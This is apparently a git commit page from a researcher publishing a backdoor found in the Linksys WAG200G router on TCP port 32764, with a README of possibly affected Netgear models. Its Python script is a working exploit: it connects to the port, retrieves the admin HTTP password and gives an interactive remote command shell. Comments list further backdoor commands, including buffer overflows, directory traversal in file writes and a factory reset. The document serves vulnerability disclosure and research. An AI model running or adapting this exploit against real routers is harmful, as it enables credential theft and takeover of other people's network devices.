first commit...
This commit is contained in:
elvanderb
commit
ccf42581b1
|
|
@ -0,0 +1,4 @@
|
|||
"THE BEER-WARE LICENSE" (Revision 32764):
|
||||
Eloi Vanderbeken wrote those files. As long as you retain this notice you
|
||||
can do whatever you want with this stuff. If we meet some day, and you think
|
||||
this stuff is worth it, you can buy me a beer in return.
|
||||
|
|
@ -0,0 +1,12 @@
|
|||
Some random code/data about the backdoor I found in my Linksys WAG200G (TCP/32764).
|
||||
|
||||
The backdoor may be present in other hardware, I'll update this readme accordingly :)
|
||||
|
||||
Backdoor confirmed in :
|
||||
- Linksys WAG200G
|
||||
|
||||
Backdoor may be present in :
|
||||
- NetGear DG934 [probability : 99.99%] (http://codeinsecurity.wordpress.com/category/reverse-engineering/)
|
||||
- Netgear DG834 (http://www.netgear-forum.com/forum/index.php?showtopic=6192)
|
||||
- Netgear WPNT834 (http://forum1.netgear.com/showthread.php?p=270354)
|
||||
- Netgear DG834G (http://superuser.com/questions/166627/netgear-router-listening-on-port-32764)
|
||||
Binary file not shown.
|
|
@ -0,0 +1,60 @@
|
|||
import socket
|
||||
import struct
|
||||
import sys
|
||||
|
||||
HOST = '192.168.1.1'
|
||||
PORT = 32764
|
||||
|
||||
def send_message(s, message, payload='') :
|
||||
header = struct.pack('<III', 0x53634D4D, message, len(payload))
|
||||
s.send(header+payload)
|
||||
sig, ret_val, ret_len = struct.unpack('<III', s.recv(0xC))
|
||||
assert(sig == 0x53634D4D)
|
||||
if ret_val != 0 :
|
||||
return ret_val, "ERROR"
|
||||
ret_str = ""
|
||||
while len(ret_str) < ret_len :
|
||||
ret_str += s.recv(ret_len-len(ret_str))
|
||||
return ret_val, ret_str
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
send_message(s, 3, "wlan_mgr_enable=1")
|
||||
print send_message(s, 2, "http_password")[1]
|
||||
|
||||
while 1 :
|
||||
print send_message(s, 7,sys.stdin.readline().strip('\n'))[1]
|
||||
|
||||
s.close()
|
||||
|
||||
#commands :
|
||||
# 1 : get infos
|
||||
# 2 : get var -> possible overflow
|
||||
# 3 : set var -> buffer overflow
|
||||
# 4 : commit nvram (read nvram /dev/mtdblock/3 from /tmp/nvram and check CRC)
|
||||
# 5 : bridge mode ?
|
||||
# wan_mode=bridgedonly
|
||||
# wan_encap=0
|
||||
# wan_vpi=8
|
||||
# wan_vci=81
|
||||
# /usr/bin/killall br2684ctl
|
||||
# /usr/bin/killall udhcpd
|
||||
# /usr/bin/killall -9 atm_monitor
|
||||
# /usr/sbin/rc wan stop >/dev/null 2>&1
|
||||
# /usr/sbin/atm_monitor&
|
||||
# 6 : show speed
|
||||
# 7 : cmd
|
||||
# special commands :
|
||||
# exit, bye, quit -> quit... (set alive to 0)
|
||||
# cd : change directory (a little bit WTF)
|
||||
# other commands :
|
||||
# integer overflow in stdout handling (?) not exploitable but still ...
|
||||
# buffer overflow (buffer de 0x10000)
|
||||
#
|
||||
# 8 : write file (file name in payload, dir : tmp, directory traversa)
|
||||
# 9 : print version
|
||||
#10 : print modem router ip (nvram_get(lan_ipaddr))
|
||||
#11 : resaure default settings (nvram_set(restore_default, 1) / nvram_commit)
|
||||
#12 : read /dev/mtdblock/0 [-4:-2]
|
||||
#13 : dump nvram on disk (/tmp/nvram) and commit
|
||||
|
||||
Loading…
Reference in New Issue